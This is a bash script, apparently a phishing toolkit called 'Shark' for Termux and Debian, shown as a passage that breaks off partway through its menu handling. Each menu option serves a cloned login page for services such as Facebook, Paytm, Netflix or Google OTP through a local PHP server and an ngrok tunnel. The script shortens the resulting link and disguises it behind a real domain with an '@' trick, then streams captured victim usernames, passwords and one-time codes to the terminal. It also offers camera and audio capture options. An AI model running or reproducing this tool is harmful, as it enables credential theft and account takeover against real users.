#!/data/data/com.termux/files/usr/bin/bash

##############################################
#                                            #
#             PROJECT: SHARK                 #
#             AUTHOR: ASHISH                 #
#              SHARK ©2020                   #
#     EMAIL: ashishsingh103020@gmail.com     #
#           BEST PHISHING TOOLS              #              
#       created by :- a s h i s h            #
#                                            #
##############################################

#########
# COLORS
#########

#colors
white="\033[1;37m"                                          ##
grey="\033[0;37m"                                           ##
purple="\033[1;35m"                                         ##
red="\033[1;31m"                                            ##
green="\033[1;32m"                                          ##
yellow="\033[1;33m"                                         ##
purple="\033[0;35m"                                         ##
cyan="\033[0;36m"                                           ##
cafe="\033[0;33m"                                           ##
fiuscha="\033[0;35m"                                        ##
blue="\033[1;34m"                                           ##
l_red="\033[1;37;41m"                                       ##
nc="\033[0m"                                                ## 

##########
# VERSION
##########

VERSION="2.0.3"

BIN="${PREFIX}/bin"


################
# PRINT MESSAGE
################

msg() {
	printf "${blue}[ - ] ${green}${1}\n${nc}"
}

norm_msg() {
	printf "${green}${1}\n${nc}"
}

error_msg() {
        printf "${red}[ ! ] ${white}${1}\n${nc}"
}

#spinner
spinner() {
        pid=$!
        spin='\|/-'
        i=0
        tput civis
        while kill -0 $pid 2>/dev/null
	do	
                i=$(( (i+1) %4 ))
                printf "\r${cyan1}[${spin:$i:1}]${nc} ${cyan1} $launch"
                sleep .1
	done
        printf "\r   ${green}[✔]${nc} ${green} $splashdown"
        sleep 1;echo 
        tput cnorm
}


#####
# OS
#####

function os () {
if [ -e $BIN/termux-info ]; then
                BIN="${PREFIX}/bin"
		php="${PREFIX}/share/phs"
		files="/sdcard"
		shark="${PREFIX}/share/shark"
                old_shark="${PREFIX}/bin/shark"
		OS=TERMUX
	else
	        BIN="/usr/bin"
	        php="/usr/share/phs"
		files="$HOME/Desktop"
		shark="/usr/share/shark"
		old_shark="/usr/bin/shark"
		OS=DEBIAN 
fi
}


function main_update() {
wget https://github.com/just-hack/shark/raw/master/shark -O ${shark}/shark && rm -rf ${old_shark} && cp -rf ${shark}/shark $BIN && chmod 777 $BIN/shark
}


function update() {
	version=$(curl -L -s https://raw.githubusercontent.com/just-hack/shark/master/shark | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
	if [ "${1}" != "-u" ] || [ "${1}" != "--update" ]; then
		[ ${latest_version} != ${VERSION} ] && echo && msg "shark update is available !!" && sleep 2.5 && echo && msg "Run shark -u , shark --update" && echo && exit 1;	       
        fi
}

###########
# INTERNET
###########

#check ineternet connectivity for update
function internet() {
ping -c 1 google.com > /dev/null 2>&1
if [ $? -eq 0 -a ! "${1}" = "--update" ] && [ $? -eq 0 -a ! "$1" = "-u" ]; then
        update
fi
}


function connection() {
        ping -c 1 google.com > /dev/null 2>&1
        if [[ "$?" != 0 ]]
        then
                error_msg "No internet"
        exit 0
        fi
}

function check_update() {	
        connection
        version=$(curl -L -s https://raw.githubusercontent.com/just-hack/shark/master/shark | grep -w "VERSION=" | head -n1)
	latest_version=$(echo ${version} | sed -e 's/[^0-9]\+[^0-9]/ /g' | cut -d '"' -f1)
        if [ ${latest_version} = ${VERSION} ];then		
                echo -e "\tReading \tpackage \tlists... \tDone
                         \tBuilding \tdependency \ttree       
                         \tReading \tstate \tinformation... \tDone
                         \tshark \tis \talready \tthe \tnewest \tversion \t($VERSION)." | awk '{$1=$1};1'
	        exit 1
	else
		main_update
		exit 1
	fi
}

########
# USAGE
########

usage() {
        cat <<EOF
Usage: $(basename $0) [OPTIONS] available
shark - future of phishing is here,
A shark is a tool that will help you \do Phishing \in an advanced way so no one checks and identify that you are doing phishing.
Copyright 2020 <ashishsingh103020@gmail.com>
Options:
  -u, --update      Update shark
  -v, --version     Display the current shark version installed on your device
  -h, --help        Print this help message
  -a, --assist      List detail discription of shark
  -p, --purge       Uninstall shark
  --fix-ngrok       Fix ngrok issue (add new authtoken)
  --fix-patches     Check missing packages & fix patches
For additional info, see: https://github.com/Bhaviktutorials/shark
EOF
}

function purge_shark() {
printf "${red} Do you wish to delete camera and audio files too ? y/n " && read ans && [ "$ans" != "${ans#[Yy]}" ] && rm -rf ${files}/Camera_hack ${files}/Audio_hack
rm -rf ${shark} ${old_shark}
}


function assist() {
#put manpage in man dir later
man ${shark}/manpage
}

function fix_ngrok() {
if [ $OS != "TERMUX" ]; then
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip -O ngrok.zip
else 
wget https://github.com/Linux-Droid/Ngrok/raw/master/Ngrok_Linux_Droid.zip -O ngrok.zip
fi
unzip ngrok.zip && rm -rf ngrok.zip
printf "${green} Enter your ngrok authtoken :\n "
read authtoken
$authtoken >> /dev/null 2>&1 && chmod +x ngrok && mv ngrok $BIN
}

###########
# OPTS ARG
###########

#getopts argument
while true; do
        case "$1" in		
                -u|--update)			
	                check_update
			;;
			
                -h|--help)			
                        usage       
                        exit 1
			;;

                -v|--version)			
                        printf "version $VERSION\n"
                        exit 1
                        ;;
			
		-p|--purge)
		        purge_shark
			exit 1
			;;

		-a|--assist)
			assist
			exit 1
			;;
						
		--fix-patches)			
			sed -i -e 's/\r$//' ${shark}/setup
			chmod 777 ${shark}/setup
		        ${shark}/setup
			exit 1
			;;
			
		--fix-ngrok)
		        fix_ngrok
		        exit 1
			;;
					
                -*)			
                        echo "ERROR: unknown option '$1'" 1>&2
                        echo "see '--help' for usage" 1>&2
                        exit 1
                        ;;

                *)	
                        f=$1
                        break			
                        ;;
	esac
        shift
done

##############
# MAIN DRIVER
##############

# CHECK FILE 
file_check() {
[ ! -d "${files}/Camera_hack" ] && mkdir -p ${files}/Camera_hack
[ ! -d "${files}/Audio_hack" ] && mkdir -p ${files}/Audio_hack
}

#catch_ip camera
catch_ip() {
ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
printf "${green}[${white}+${green}] ${yellow}IP:${white} %s ${nc} \n" $ip
cat ip.txt >> saved.ip.txt
}

# KILL NGROK
function kill_ngrok() {
php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok
}

function url_checker() {
if [ ! "${1//:*}" = http ] || [ ! "${1//:*}" = https ] ; then
printf "${red} Invalid URL. Please use http or https. \n "
exit 1
fi
}

# URL_SHORTNER
function url_shortner() {	
        printf "\n"
	# echo `wget -q -O - http://tny.im/yourls-api.php?action=shorturl\&format=simple\&url=${link}\&keyword=$2
        short=$(curl -s https://is.gd/create.php\?format\=simple\&url\=${link})
        shorter=${short#https://}
        printf "\n"
        read -p $'${blue} shark ${white}>> ${green}Mask Your url domain here ${yellow}: Ex. https://facebook.com : ${nc}\n ' mask
        url_checker $mask	
	printf "${blue} shark ${white}>> ${green}Enter your key words ${yellow}: Ex. free-insta-followers\n"        
	printf "${blue} shark ${white}>> ${green} Don't use space in your words\n"	
        read -p $'${blue} shark ${white}>> ${green}Enter your words here :${nc}\n ' words
        final_url=$mask-$words@$shorter
	printf "$final_url\n"
}

# MAIN 

function main() {
        launch="starting shark server";splashdown="started shark server";printf "\n";connection;php -S 127.0.0.1:4444 > /dev/null 2>&1 & sleep 2;ngrok http 4444 > /dev/null 2>&1 & sleep 20 & spinner;link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io");url_shortner;
}


while :
do
clear
printf "${blue}

        ██████╗██╗  ██╗ █████╗ ██████╗ ██╗  ██╗
       ██╔════╝██║  ██║██╔══██╗██╔══██╗██║ ██╔╝
       ╚█████╗ ███████║███████║██████╔╝█████═╝
        ╚═══██╗██╔══██║██╔══██║██╔══██╗██╔═██╗
       ██████╔╝██║  ██║██║  ██║██║  ██║██║ ╚██╗
       ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝ v ${VERSION}\n\n "
       
printf $'${green}        =======================================\n'
printf $'        ${l_red}    c r e a t e d  b y  a s h i s h    ${nc}\n '
printf $'${green}        =======================================${nc}\n\n'

###change banner ---- start here
banner(){
printf "${purple}==================================================================\n\n"
printf "\e[1;31m[\e[0m\e[1;92m01\e[0m\e[1;31m] \e[0m\e[1;37;44mFacebook\e[0m           \e[1;31m[\e[0m\e[1;92m12\e[0m\e[1;31m] \e[0m\e[1;37;104mLinkedin\e[0m          \e[1;31m[\e[0m\e[1;92m23\e[0m\e[1;31m] \e[0m\e[1;37;44mWordpress\e[0m\n\n"
printf "\e[1;31m[\e[0m\e[1;92m02\e[0m\e[1;31m] \e[0m\e[1;37;41mPinterest\e[0m          \e[1;31m[\e[0m\e[1;92m13\e[0m\e[1;31m] \e[0m\e[1;37;46mHotstar\e[0m           \e[1;31m[\e[0m\e[1;92m24\e[0m\e[1;31m] \e[0m\e[1;37;43mSnapchat\e[0m\n\n" 
printf "\e[1;31m[\e[0m\e[1;92m03\e[0m\e[1;31m] \e[0m\e[1;48;5;200mInstagram\e[0m          \e[1;31m[\e[0m\e[1;92m14\e[0m\e[1;31m] \e[0m\e[1;37;42mSpotify\e[0m           \e[1;31m[\e[0m\e[1;92m25\e[0m\e[1;31m] \e[0m\e[1;37;40mProtonmail\e[0m\n\n"
printf "\e[1;31m[\e[0m\e[1;92m04\e[0m\e[1;31m] \e[0m\e[1;37;40mUber \e[1;37;42mEats\e[0m          \e[1;31m[\e[0m\e[1;92m15\e[0m\e[1;31m] \e[0m\e[1;37;40mGithub\e[0m            \e[1;31m[\e[0m\e[1;92m26\e[0m\e[1;31m] \e[0m\e[1;38;5;209m\e[40mStackoverflow\e[0m\n\n" 
printf "\e[1;31m[\e[0m\e[1;92m05\e[0m\e[1;31m] \e[0m\e[1;93;40mOLA\e[0m                \e[1;31m[\e[0m\e[1;92m16\e[0m\e[1;31m] \e[0m\e[1;37;43mIPFinder\e[0m          \e[1;31m[\e[0m\e[1;92m27\e[0m\e[1;31m] \e[0m\e[1;40m\e[91mE\e[94mb\e[93ma\e[92my\e[0m\n\n"  
printf "\e[1;31m[\e[0m\e[1;92m06\e[0m\e[1;31m] \e[0m\e[1;40m\e[94mG\e[91mO\e[93mO\e[94mG\e[92mL\e[91mE\e[0m             \e[1;31m[\e[0m\e[1;92m17\e[0m\e[1;31m] \e[0m\e[1;37;101mZomato\e[0m            \e[1;31m[\e[0m\e[1;92m28\e[0m\e[1;31m] \e[0m\e[1;48;5;129mTwitch\e[0m\n\n"           
printf "\e[1;31m[\e[0m\e[1;92m07\e[0m\e[1;31m] \e[0m\e[1;107m\e[30mPay\e[106mtm\e[0m              \e[1;31m[\e[0m\e[1;92m18\e[0m\e[1;31m] \e[0m\e[1;48;5;91mPhonePay\e[0m          \e[1;31m[\e[0m\e[1;92m29\e[0m\e[1;31m] \e[0m\e[1;48;5;236mAJIO\e[0m\n\n"
printf "\e[1;31m[\e[0m\e[1;92m08\e[0m\e[1;31m] \e[0m\e[1;91;107mNetflix\e[0m            \e[1;31m[\e[0m\e[1;92m19\e[0m\e[1;31m] \e[0m\e[1;107m\e[30mPay\e[106mpal\e[0m            \e[1;31m[\e[0m\e[1;92m30\e[0m\e[1;31m] \e[0m\e[1;48;5;21mMobikwik\e[0m\n\n"   
printf "\e[1;31m[\e[0m\e[1;92m09\e[0m\e[1;31m] \e[0m\e[1;48;5;200mInsta-Followers\e[0m    \e[1;31m[\e[0m\e[1;92m20\e[0m\e[1;31m] \e[0m\e[1;48;5;4mTelegram\e[0m          \e[1;31m[\e[0m\e[1;92m31\e[0m\e[1;31m] \e[0m\e[1;48;5;89mCamera_hack\e[m\n\n"
printf "\e[1;31m[\e[0m\e[1;92m10\e[0m\e[1;31m] \e[0m\e[1;37;40mAmazon\e[0m             \e[1;31m[\e[0m\e[1;92m21\e[0m\e[1;31m] \e[0m\e[1;37;46mTwitter\e[0m           \e[1;31m[\e[0m\e[1;92m32\e[0m\e[1;31m] \e[0m\e[1;48;5;197mAudio_hack\e[m\n\n"
printf "\e[1;31m[\e[0m\e[1;92m11\e[0m\e[1;31m] \e[0m\e[1;37;42mWhatsApp\e[0m           \e[1;31m[\e[0m\e[1;92m22\e[0m\e[1;31m] \e[0m\e[1;34;103mFlipcart\e[0m          \e[1;31m[\e[0m\e[1;92m99\e[0m\e[1;31m] \e[0m\e[1;91;102mExit\e[0m\n\n"
printf "${purple}==================================================================${nc}\n\n"
read -p $'${blue} shark ${white}>> ${green}Choose Your Option :${nc}\n ' option
}


#######
# MAIN
#######

os
kill_ngrok
banner
	
         if [ $option = 01 ] || [ $option = 1 ]
         then
	                    cd $php/facebook/ && main
			    tail -f usernames.txt 
                            break;
			     
	 elif [ $option = 02 ] || [ $option = 2 ]
	 then
			   cd $php/pinterest/ && main                           
                           tail -f log.txt | grep -e "id" -e "password"
                           break;

	 elif [ $option = 03 ] || [ $option = 3 ]
	 then
		           cd $php/instagram/ && main			  
			   tail -f log.txt			   
                           break;
			   
	elif [ $option = 04 ] || [ $option = 4 ]
        then
                          cd $php/UberEats-Phishing/
			  echo 
			  connection
			  ( sleep 5 ) &> /dev/null & spin_shark
			  php -S 127.0.0.1:4444 > /dev/null 2>&1 & 
			  sleep 1
			  echo 
			  (sleep 6) &> /dev/null & spin
			  echo
			  tput civis
			  ngrok http 4444 > /dev/null 2>&1 &
			  ( sleep 18 ) &> /dev/null & spinner
			  echo 
			  tput cnorm
			  link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") 
			  ( sleep 6 ) &> /dev/null & spinner1
			  url_shortner 
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
			  echo
			  tail -f log.txt | grep -e "Email_or_Phone" -e "password" -e "verificationCode"

                          break;
			  
        elif [ $option = 05 ] || [ $option = 5 ]
        then
                          cd $php/ola-otpbypass/
                          echo 
			  connection
                          ( sleep 5 ) &> /dev/null & spin_shark
		          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		          sleep 1   
		          echo 
		          (sleep 6) &> /dev/null & spin
			  echo
			  tput civis
		          ngrok http 4444 > /dev/null 2>&1 &
		          ( sleep 18 ) &> /dev/null & spinner
		          echo 
			  tput cnorm
		          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")  		        
			  ( sleep 6 ) &> /dev/null & spinner1
		          url_shortner
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
			  echo
		          tail -f log.txt | grep -e "number" -e "otp" -e "OTP"

                          break;
			  
         elif [ $option = 06 ] || [ $option = 6 ]
	 then
                          cd $php/google-otp/                         
                          echo 
			  connection
		          ( sleep 5 ) &> /dev/null & spin_shark  
		          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
		          sleep 1
		          echo 
		          (sleep 6) &> /dev/null & spin 
			  echo
			  tput civis
		          ngrok http 4444 > /dev/null 2>&1 &
		          ( sleep 18 ) &> /dev/null & spinner
		          echo 
			  tput cnorm
		          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")        
			  ( sleep 6 ) &> /dev/null & spinner1
		          url_shortner
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
			  echo
		          tail -f log.txt | grep -e "email" -e "password" -e "OTP"
  
                          break;
			  
       elif [ $option = 07 ] || [ $option = 7 ]
       then
                          cd $php/Paytm-Phishing/
                          echo 
                          echo -e "\e[1;31m[\e[0m\e[1;77m 1 \e[0m\e[1;31m]\e[0m\e[1;32m Sign In \e[0m" 
			  echo
                          echo -e "\e[1;31m[\e[0m\e[1;77m 2 \e[0m\e[1;31m]\e[0m\e[1;32m Sign UP \e[0m"
                          echo 
                          read -p $'\e[1;91m[\e[0m\e[1;92m >>> \e[0m\e[1;91m]\e[0m\e[1;92m Enter Your Choice : \e[0m' option1
		          if [ $option1 = 1 ] || [ $option1 = 01 ]
			  then
			        cd paytm/
                                echo 
				connection
                                ( sleep 5 ) &> /dev/null & spin_shark
                                php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                                sleep 1
                                echo 
                                (sleep 6) &> /dev/null & spin
				echo
				tput civis
                                ngrok http 4444 > /dev/null 2>&1 &
                                ( sleep 18 ) &> /dev/null & spinner
                                echo 
				tput cnorm
                                link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
				( sleep 6 ) &> /dev/null & spinner1
			        url_shortner
				read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			        clear
				shark_logo
			        echo 
			        echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			        echo 
			        echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                                echo 
                                tail -f log.txt | grep -e "email" -e "username" -e "password" -e "otp"
		
	                	else
                
                                cd signup/
                                echo 
				connection
                                ( sleep 5 ) &> /dev/null & spin_shark
                                php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                                sleep 1
                                echo 
                                (sleep 6) &> /dev/null & spin
				echo
				tput civis
                                ngrok http 4444 > /dev/null 2>&1 &
                                ( sleep 18 ) &> /dev/null & spinner
                                echo 
				tput cnorm
                                link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                             
				( sleep 6 ) &> /dev/null & spinner1
			        url_shortner
				read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			        clear
				shark_logo
			        echo
			        echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			        echo 
			        echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                                echo 
                                tail -f log.txt | grep -e "email" -e "loginPassword" -e "mobileNumber" -e "otp"
				fi
                                
				break;
				
        elif [ $option = 08 ] || [ $option = 8 ]
	then

                          cd $php/Netflix/
                          echo 
			  connection
                          ( sleep 5 ) &> /dev/null & spin_shark
                          php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                          sleep 1
                          echo
                          (sleep 6) &> /dev/null & spin
			  echo
			  tput civis
                          ngrok http 4444 > /dev/null 2>&1 &
                          ( sleep 18 ) &> /dev/null & spinner
                          echo 
			  tput cnorm
                          link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                                                 
			  ( sleep 6 ) &> /dev/null & spinner1
		          url_shortner
			  read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			  clear
			  shark_logo
			  echo 
			  echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			  echo 
			  echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                          echo 
                          tail -f log.txt | grep -e "userLoginId" -e "password" -e "OTP"                 

                          break;

           elif [ $option = 09 ] || [ $option = 9 ]
	   then
                           cd $php/instafollow/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                         
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
		           echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "username" -e "password" -e "password" -e "pin" -e "Pin"                        

                           break;
			   
               elif [ $option = 10 ]
	       then
                           cd $php/amazonsign/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "email" -e "password" -e "OTP"  

                           break;

                  elif [ $option = 11 ]
	          then
                           cd $php/whatsapp-phishing/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                        
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "number" -e "OTP" -e "otp"      

                           break;
			   
	          elif [ $option = 12 ]
	          then
                           cd $php/Linkedin/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                        
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "email" -e "Email" -e "password" -e "pin" -e "Pin"       

                           break;
   
                     elif [ $option = 13 ]
	             then
                           cd $php/Hotstar-otp-bypass/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m[(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
		           echo 
		           echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "phoneNo" -e "OTP"       

                           break;
      
                    elif [ $option = 14 ]
	            then
                           cd $php/spotify/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                        
			   ( sleep 6 ) &> /dev/null & spinner1
		           url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
                           tail -f log.txt | grep -e "username" -e "password" -e "password" -e "pin" -e "Pin"        

                           break;
			   
	            elif [ $option = 15 ]
	            then
                           cd $php/github/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
			   echo
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                         
			   ( sleep 6 ) &> /dev/null & spinner1
	                   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
			   echo
                           tail -f log.txt | grep -e "login" -e "password" -e "otp"       

                           break;
			   
	        elif [ $option = 16 ]
	        then
                           cd $php/ipfinder/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
             		   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m======================== \e[92m"
                           echo 
                           tail -f ip.txt        

                           break;

                  elif [ $option = 17 ]
	          then
                           cd $php/Zomato-Phishing/
                           echo 
			   connection
                           ( sleep 5 ) &> /dev/null & spin_shark
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 1
                           echo 
                           (sleep 6) &> /dev/null & spin
			   echo
			   tput civis
                           ngrok http 4444 > /dev/null 2>&1 &
                           ( sleep 18 ) &> /dev/null & spinner
                           echo 
			   tput cnorm
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")                          
			   ( sleep 6 ) &> /dev/null & spinner1
	                   url_shortner
			   read -p $'\e[91m[\e[92m~\e[91m]\e[93m Start Phishing\e[92m(Enter) \e[93mor Close\e[92m(Ctrl+c) :\e[m ' listner
			   clear
			   shark_logo
			   echo 
			   echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo 
			   echo -e "\e[96m========================\e[92m    SHARK © 2020    \e[96m========================= \e[92m"
                           echo 
